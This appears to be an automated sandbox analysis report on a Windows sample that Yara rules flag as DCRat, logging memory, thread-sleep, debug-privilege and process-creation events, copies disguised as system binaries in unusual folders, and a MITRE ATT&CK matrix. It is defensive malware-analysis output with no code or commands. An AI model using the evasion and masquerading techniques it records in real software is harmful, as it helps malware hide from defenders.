Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Memory allocated: 1AA50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe	Memory allocated: 1870000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Mail\ctfmon.exe	Memory allocated: 1B3E0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Mail\ctfmon.exe	Memory allocated: 12F0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Mail\ctfmon.exe	Memory allocated: 1AF00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Memory allocated: 16C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Memory allocated: 1B080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Memory allocated: F30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Memory allocated: 1ABA0000 memory reserve \| memory write watch
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Memory allocated: 2B30000 memory reserve \| memory write watch
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Memory allocated: 1AB30000 memory reserve \| memory write watch
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Memory allocated: 980000 memory reserve \| memory write watch
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Memory allocated: 1A5A0000 memory reserve \| memory write watch
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Memory allocated: 1160000 memory reserve \| memory write watch
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Memory allocated: 1AF10000 memory reserve \| memory write watch
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Memory allocated: 770000 memory reserve \| memory write watch
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Memory allocated: 1A550000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Memory allocated: FB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Memory allocated: 1ADB0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Mail\ctfmon.exe	Memory allocated: 2BA0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Mail\ctfmon.exe	Memory allocated: 1AE50000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 599844	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\ctfmon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Window / User API: threadDelayed 1569	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Window / User API: threadDelayed 869	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Window / User API: threadDelayed 1317	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Window / User API: threadDelayed 682	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Window / User API: threadDelayed 364	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Window / User API: threadDelayed 625	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe	Window / User API: threadDelayed 365
Source: C:\Program Files\Windows Mail\ctfmon.exe	Window / User API: threadDelayed 364
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Window / User API: threadDelayed 366
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Window / User API: threadDelayed 362
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Window / User API: threadDelayed 367
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Window / User API: threadDelayed 366
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Window / User API: threadDelayed 366
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Window / User API: threadDelayed 365
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Window / User API: threadDelayed 598
Source: C:\Program Files\Windows Mail\ctfmon.exe	Window / User API: threadDelayed 700

Source: C:\Users\user\Desktop\B9exXW7c3t.exe TID: 3276	Thread sleep count: 1569 > 30	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe TID: 3276	Thread sleep count: 869 > 30	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe TID: 6844	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe TID: 4500	Thread sleep count: 1317 > 30	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe TID: 4500	Thread sleep count: 682 > 30	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe TID: 7440	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe TID: 7440	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe TID: 7440	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe TID: 7440	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe TID: 2892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe TID: 7360	Thread sleep count: 364 > 30	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe TID: 6340	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe TID: 7296	Thread sleep count: 625 > 30	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe TID: 7736	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe TID: 7736	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe TID: 7736	Thread sleep time: -599844s >= -30000s	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe TID: 7296	Thread sleep count: 199 > 30	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe TID: 7232	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe TID: 7508	Thread sleep count: 365 > 30
Source: C:\Program Files\Windows Mail\ctfmon.exe TID: 7340	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Mail\ctfmon.exe TID: 7520	Thread sleep count: 364 > 30
Source: C:\Program Files\Windows Mail\ctfmon.exe TID: 7400	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe TID: 7528	Thread sleep count: 366 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe TID: 7256	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe TID: 7496	Thread sleep count: 362 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe TID: 7328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe TID: 7660	Thread sleep count: 367 > 30
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe TID: 7616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe TID: 7644	Thread sleep count: 366 > 30
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe TID: 7368	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe TID: 7592	Thread sleep count: 366 > 30
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe TID: 7324	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe TID: 7628	Thread sleep count: 365 > 30
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe TID: 7540	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe TID: 7808	Thread sleep count: 598 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe TID: 7784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Mail\ctfmon.exe TID: 8100	Thread sleep count: 205 > 30
Source: C:\Program Files\Windows Mail\ctfmon.exe TID: 8100	Thread sleep count: 700 > 30
Source: C:\Program Files\Windows Mail\ctfmon.exe TID: 8084	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Mail\ctfmon.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Mail\ctfmon.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 599844	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\ctfmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Mail\ctfmon.exe	Thread delayed: delay time: 922337203685477

Source: B9exXW7c3t.exe, 00000000.00000002.2041043654.000000001BF03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: B9exXW7c3t.exe, 00000000.00000002.2041043654.000000001BF03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: QeWHGGzCXwoQygZUiDI.exe, 0000001A.00000002.2075420493.000000001BB40000.00000004.00000020.00020000.00000000.sdmp, ApplicationFrameHost.exe, 0000001C.00000002.2089151977.000000001BB32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process token adjusted: Debug
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process token adjusted: Debug
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process token adjusted: Debug
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

Process created: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe "C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe"

Jump to behavior

Source: C:\Users\user\Desktop\B9exXW7c3t.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 0000001E.00000002.2180837076.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2173207701.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2180837076.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2131167381.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2189170513.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2186087124.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2023417505.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2023417505.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2131167381.000000000275F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2189170513.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2295888940.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2233092169.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2185833372.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2233092169.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2185558862.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2173207701.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2185833372.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2185558862.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2043423134.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2080688928.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2186087124.000000000258F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2295888940.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2189636764.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2175740771.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2025245210.0000000012E8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B9exXW7c3t.exe PID: 5880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 3808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 5612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 2796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 1196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 1084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 6648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winlogon.exe PID: 7176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winlogon.exe PID: 7208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 8060, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000001E.00000002.2180837076.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2173207701.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2180837076.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2131167381.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2189170513.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2186087124.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2023417505.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2023417505.00000000031CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2131167381.000000000275F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2189170513.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2295888940.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2233092169.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2185833372.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2233092169.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2185558862.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2173207701.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2185833372.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2185558862.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2043423134.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2080688928.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2186087124.000000000258F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2295888940.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2189636764.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2175740771.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2025245210.0000000012E8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B9exXW7c3t.exe PID: 5880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 4124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 3808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ApplicationFrameHost.exe PID: 5612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 2796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 1196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 1084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 6648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winlogon.exe PID: 7176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: winlogon.exe PID: 7208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QeWHGGzCXwoQygZUiDI.exe PID: 7760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ctfmon.exe PID: 8060, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	11 Process Injection	123 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	411 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	411 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	111 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
